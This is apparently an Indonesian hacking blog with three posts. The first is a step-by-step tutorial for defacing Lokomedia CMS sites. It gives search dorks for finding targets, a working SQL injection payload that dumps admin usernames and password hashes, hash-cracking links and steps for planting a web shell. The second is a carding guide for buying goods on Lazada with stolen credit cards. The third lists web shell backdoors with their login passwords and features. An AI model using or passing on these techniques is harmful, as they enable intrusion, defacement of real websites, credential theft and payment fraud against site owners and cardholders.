Sunday, 7 May 2017

Deface SQLI CMS Lokomedia 2017



Hello para fans Mr. B47UL ๐Ÿ˜‰
Seperti biasa, NdasBajul akan kasih tutorial deface lagi nih....
karena mimin gk suka banyak bacod, oke langsung cekidoot...


Berbicara soal teknik SQLi CMS Lokomedia ini, pasti sudah kesohor di kalangan defacer/hacker tanah air. Terlebih lagi sekarang ini yg semakin banyak defacer yang mengexploit CMS Lokomedia ini. Ga usah panjang lebar langsung ke topik pembahasan yaitu "Tutorial Deface SQLi CMS Lokomedia"

Bahan :
1. Dork :
inurl:statis-1-profil.html
inurl:statis-2-profil.html
inurl:statis-3-strukturorganisasi.html
Note : tambahkan site:org site:net :site:go.id site:ac.id site:id
(Use Your Brain)

2. Exploit SQLi (SQL Injection) :

'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+

Bingung cara ngexploit nya ?? sini di kasih tau :v
contoh :

http://sitepemerintah.co.li/statis-2-profil.html

kamu tambahin exploit nya sesudah angka jadi kaya gini :

http://sitepemerintah.co.li/statis-2'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+-profil.html

ngerti kan ??

3. MD5 Decrypter :
MD5 Decrypt nya pake otak kamu sendiri aja :v tenang ada tool online nya kok
https://hashkiller.co.uk/md5-decrypter.aspx
http://md5online.org/

Tutorial :
1. Dorking pake dork di atas,

2. Cari targetnya, setelah ketemu masukin inject nya ! seperti contoh di atas

3. Jika Vuln akan ada kode MD5 di tab bar (liat gambar aja biar jelas)


4. Lalu kamu pencet CTRL+U lalu kamu copykan kode MD5 tersebut, lalu decrypt di MD5 Decrypter

5. Tinggal cari dimana tempat login admin nya :) biasanya ada di :
http://target-suka.co.li/admin/
http://target-suka.co.li/adminweb/
http://target-suka.co.li/admininistrator/

6. Untuk Nanem shell ?? User Your Brain Kids !! (Jgn mau nya di suapin mulu)

7. Akses shell ?? setelah nanem shell klik kanan gambar yang ancur lalu klik view image

8. Jangan lupa nitip nick Mr. B47UL ya :v

Note : tapi saya sarankan sebelum melakukan inject terhadap target, lebih baik cari dlu login adminnya :)

Karena CMS Lokomedia ini dipakai oleh web indonesia, mohon bantuan untuk tidak merusak !!
Hargai Para webmaster tanah air ini

Mohon maaf kaga ada gambar nya, karna saat saya eksekusi target saya lupa di screenshots :v

No Army Can Stop Our Idea :) Respect !!

Oke para fansss :v
Gimaba mudah kan ?

Ada pertanyaan ? Mau request ?
Langsung hubungi saya di FP  : Mr. B47UL

Saturday, 6 May 2017

cara carding lazada 2017



Hello Mastah mastah tamvan๐Ÿ˜š

Kali ini mimin Bajul mau share tutorial lagi nih.
Oke, langsung aja simak ya guys...

method yang pertama
Syarat :

1. Akun baru / Fresh

2. Email akun harus berumur 10 Minggu-an

3. Pilih pembayaran memakai Kartu Kredit

4. Pakai vpn port atau download aplikasi vpn seperti SurfEasy VPN dan Connect ke Singapore

Cara Order :
1. Penuhi syarat diatas
2. Pilih barang yang ingin di order
3. Pilih dan masukkan ke cart
4. Masukkan Alamat mu
5. Masukkan Alamat CC nya
6. Dan pencet Lanjut
7. Selesai ^^

No Resi keluar : 1-2 Hari

method yang kedua
1. Register akun pastinyaa
2. Nama akun harus sesuai nama penerima barang yaa
3. Pilih barang yang mau dibeli
4.  Bayar gan via creditcard
5.  Pembayaran pakai credit card luar indonesia harus disertai dengan virtual private network / VPN atau    juga bisa dengan ssh . vpn dan ssh harus menyesuaikan asal negara creditcard yang kamu pakai.
6. Satu lagi , biar bisa shipped dengan aman , ada baiknya gunakan 1 akun untuk maksimal 2 orderan gan   , jangan rakus wkwk.

method yang ketiga
1.Akun baru (akun lama sih bisa)
2.CC indo apa saja, type apa saja, bin terserah
3.CC Live + Fresh no extrap
4.CC nya bisa Beli di Fe-cc, or merchant shop cc apa aja Asal Ada Rules (Jika cc dead yg di beli, Ballance bisa Di refund )
5.Jika cc dah ada tinggal pilih barang > checkout
6.pilih barang mulai dari Low > kalau ngangkat bisa Order barang yang agak gedean
7. Saat check out trus gagal,cuma ada 2 akibat
>CC NYA DEAD
>CC LIVE TAPI LIMIT TIDAK MENCUKUPI OR LOW
NB>>>
1.CC gag ada HB (Hight Ballance), Yang ada cuma HL (Hight Limit)
2. kalau ada yang jual CC bilang nya HB (LOL Aja)
CC gag ada Ballance Bro yang ada cuma Limit pemakaian
Kecuali type DEBIT < Ini Berballance, sama seperti kartu DEBIT yang kalian pakai.

method yang keempat
Methode Lazada

Bahan:
1. Siapin Akun Lazadanya
2. Siapin VPN Sesuai country ccnya
3. Siapin CC ASIA LIVE+NO Extrap (Dilarang Keras Pakai CC Indo) Beli bisa di www.fe-cc.cc

Tutorial:
1. Hidupkan VPN sesuai country CC-Nya
2. Login/Sign Up Lazada
3. Pilih receh dulu, kalau bisa boleh ke yang gede
4. Checkout, masukin data CC-Nya
NB:
1. Saat Checkout dan gagal ada 2 kemungkinan
>CC NYA DEAD
>CC LIVE TAPI LIMIT TIDAK MENCUKUPI OR LOW
2. CC ga ada yang namanya HB(High Balance), yang ada cuma HL(High Limit)
3. Kalau ada yang jual CC bilang CC-Nya HB (LOL Aja)
4. CC gak ada yang berballance Gan yang ada cuma Limit pemakaian. Kecuali type DEBIT < Ini berballance, sama seperti kartu DEBIT yang Agan pakai

Disini mimin cuma memberikan tutorial saja.
Jadi semua yang agan lakukakn, diluar tanggung jawab kami ^_^

Sekian dulu ya dari NdasBajul
Jangan lupa like FP kami : Mr. B47UL

download kumpulan Shell Backdoor Terbaik 2017

Oke para fans ๐Ÿ˜ธ
Ketemu lagi nih sama NdasBajul....

Lagi mau Deface web ? Nebas Index ?
Wajib download Shell Backdoor nih...

Tau kagak, shell backdoor itu apa ?

Shell backdoor adalah bagian kode berbahaya ( misalnya PHP , Python , Ruby ) yang dapat di-upload ke situs untuk mendapatkan akses ke file yang tersimpan di situs tersebut . Setelah itu upload , hacker dapat menggunakannya untuk mengedit , menghapus , atau men-download file di situs , atau meng-upload mereka sendiri .

Nah kalau menurut saya Shell Backdoor adalah suatu akses web melalui pintu belakang yang bisa menguasai web tersebut dengan cara mengupload di dalam web target.

Oke segitulah cerita saya tentang Shell Backdoor.
Jangan banyak cincong langsung saja ini dia shell yang pernah gua pakai yang menurut gue yang terbaik
Cekibrott:


Kali ini Mimin bajul mau share Kumpulan Shell Backdoor Terbaik nih....
Simak aja ya beb ๐Ÿ˜ป


( Nb : tekan judul jika ingin mendownload )

1) 1n73ction shell v3.3

Untuk Shell 1n73ction V 3.3 Dengan 404 Not Found
Saat login akan muncul 404 Not Found, pada V 3.2
Tinggal menekan tobol ''Tab'' login forumnya akan muncul
Tapi berbeda di V 3.3 ini Walaupun kita menekan Tab atau ctrl+a kita tidak akan mungkin menemukan login form tersebut
Untuk menemukan login formnya . pastekan kode berikut di belakang nama shell kamu

?cmd=../../exe/inject

Ex :
http://site.com/namashell.php
Ubah Menjadi :
http://site.com/namashell.php?cmd=../../exe/inject
Sekarang Tekan ''Tab'' akan muncul login Form
kemudian masukkan Pasword ''1n73ction'' tanpa tanda kutip.
gampang kan :D


2) IndoXploit Shell v2

Fitur:
K-RDP Shell
-> Fitur untuk membuat Akun RDP yang dapat digunakan hanya di Windows server.
Back Connect
CPanel/FTP Auto Deface:
-> Memakai alur ftp_connect, hanya memanfaatkan kesamaan password cpanel & ftp saja. tidak semuanya bisa
hanya web yang ftp nya sama dengan user/pass cpanel nya yang bisa otomatis di deface
Config Grabb :
-> Popoji CMS
-> Voodoo CMS
-> Wordpress
-> Joomla
-> Drupal
-> Magento
-> Ellislab Devteam [CI]
-> Opencart
-> Prestashop
-> phpBB
-> Lokomedia
-> Sitelook
-> Bosweb
-> WHMCS
-> Cpanel
Jumping [error fixed] :
Jumping hpshere & Jumping /var/vhosts [ updated ]
Kelebihannyaa bisa langsung ambil nama domainnyaa :
Cpanel Crack [blank user/pass fixed]:
Fitur ini udah otomatis Grab Passwordnyaa dan juga otomatis mengambil info domain nya, ikutin saja petunjuknya .
SMTP Grabber :
Hanya mengambil info smtp joomla yg ada di config.
Auto edit user / MPC :
Udah otomatis edit seluruh user admin dari config *ga semuanya , cuma beberapa cms aja
Disetiap tools tertentu ada "NB" ikutin petunjuknya sajaa.


Pasword login : IndoXploit ( i sama x nya huruf besar ya )




Fitur :

- Symlink Tools
- Domain Viewer
- Mysql
- ConfigGrabber
- WordPress Tools
- Joomla Tools
- Script Encode Decode
- Bypass Tools
- Cpanel Tools
- BruteForce Tools
- WHMCS Decoder
- Dll

Ext; File.PhP.txt / File.php%20jpg / File.php.jpg

Klik Tab buat masukin password

Pasword login : culun

4) Shell b374k
Ya kata temen ane sih, keren :v
Mimin belum pernah nyoba :v

Pasword login : b374k

Udah dulu ya fanss ๐Ÿ˜‰
Mau request kah ? Chat di FP ae beb๐Ÿ˜

Nitip nick ane yak : Mr. B47UL
FP : Mr. B47UL